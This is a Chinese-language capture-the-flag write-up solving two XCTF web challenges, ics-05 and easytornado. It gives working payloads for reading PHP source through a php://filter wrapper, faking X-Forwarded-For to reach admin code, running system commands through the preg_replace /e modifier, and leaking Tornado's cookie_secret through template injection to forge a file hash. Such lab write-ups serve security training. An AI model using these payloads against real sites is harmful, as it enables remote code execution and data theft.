【攻防世界WEB】难度三星9分:ics-05、easytornado

举报
黑色地带(崛起) 发表于 2023/01/27 21:37:13 2023/01/27
【摘要】 【攻防世界WEB】难度三星9分:ics-05、easytornado

 目录

三、ics-05

解题方法:

过程:

四、easytornado

解题方法:

过程:




三、ics-05

编辑


解题方法:

1、php代码理解、php伪协议




过程:

进去先扫了一遍

编辑

 index.html是首页

index.php是唯一可以点的云平台设备维护中心(重点应该在这个页面了)

编辑

查看页面源码

Ctrl+U

发现最下面有base64加密的密文

编辑

解密后

(和后面读取到的源码是一样的)

编辑




 点击后,发现了传参

编辑

考虑:

注入

文件包含

php伪协议(执行php代码)


注入:(无)

编辑

文件包含:

可以读到很多,但是在这一关,通过这无法找到flag

全局环境

编辑

端口名

编辑 服务编号-端口表

编辑


php伪协议:


?page=php://filter/read=convert.base64-encode/resource=index.php

(使用base64加密后,带出来的时候就不会被执行了,然后自己再解码)

编辑

 使用这个工具解码有乱码(换了一个工具进行解码)

编辑

使用在线解码工具

编辑



//方便的实现输入输出的功能,正在开发中的功能,只能内部人员测试

if ($_SERVER['HTTP_X_FORWARDED_FOR'] === '127.0.0.1') {
//如果请求包中HTTP_X_FORWARDED_FOR为127.0.0.1
    echo "<br >Welcome My Admin ! <br >";
    $pattern = $_GET[pat];
    $replacement = $_GET[rep];
    $subject = $_GET[sub];

    if (isset($pattern) && isset($replacement) && isset($subject)) {
        preg_replace($pattern, $replacement, $subject);
//将subject中匹配pattern的部分用replacement替换
    }else{
        die();

 这段代码应该是重点了

需要:

1、X-Forwarded-For: 127.0.0.1
2、参数pat、rep、sub

3、preg_replace函数:preg_replace($pattern, $replacement, $subject)函数会将subject中匹配pattern的部分用replacement替换,启用/e参数,就会将replacement当做php代码执行


构造payload:

?pat=//e&rep=system("ls")&sub=1

编辑

使用bp抓包

编辑


payload:

?pat=//e&rep=system("ls%20-R%20s3chahahaDir")&sub=1

ls -R 递归显示文件夹目录所有文件

 %20 是空格url编码

 编辑编辑

payload:

读取flag

?pat=//e&rep=system("cat%20s3chahahaDir/flag/flag.php")&sub=1
 编辑

编辑




四、easytornado

编辑



解题方法:

1、Tornado 框架漏洞、MD5加密




过程:

知道了文件名了

编辑

MD5的生成方法

我们已经知道了文件名,就还要找到cookie_secret

编辑


本关提示是Tornado 框架

网上相关框架漏洞,可用{{handler.settings}}访问配置文件

看见上面页面中有file?filename=传参

构造payload:/file?filename={{handler.settings}}

发现报错了

编辑

 并有error?msg=进行传参

尝试构造/error?msg={{handler.settings}}

爆出了cookie_secret

编辑

b10655cb-3884-492c-b534-4feff4790db3


 前面得到的MD5(Cookie_secret+MD5(filename) )

Cookie_secret=b10655cb-3884-492c-b534-4feff4790db3

MD5(/fllllllllllllag)  =3bf9f6cf685a6dd8defadabfb41a03a1

编辑


所以

MD5(Cookie_secret+MD5(filename) )=(b10655cb-3884-492c-b534-4feff4790db33bf9f6cf685a6dd8defadabfb41a03a1)

编辑


得到的MD5为

4f91aebe3800a21135e140d4f94424e1



将flag.txt页面的参数构造为访问/fllllllllllllag的参数

file?filename=/fllllllllllllag&filehash=4f91aebe3800a21135e140d4f94424e1

编辑

 编辑



【版权声明】本文为华为云社区用户原创内容,转载时必须标注文章的来源(华为云社区)、文章链接、文章作者等基本信息, 否则作者和本社区有权追究责任。如果您发现本社区中有涉嫌抄袭的内容,欢迎发送邮件进行举报,并提供相关证据,一经查实,本社区将立刻删除涉嫌侵权内容,举报邮箱: cloudbbs@huaweicloud.com
  • 点赞
  • 收藏
  • 关注作者

评论(0

0/1000
抱歉,系统识别当前为高风险访问,暂不支持该操作

全部回复

上滑加载中

设置昵称

在此一键设置昵称,即可参与社区互动!

*长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。

*长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。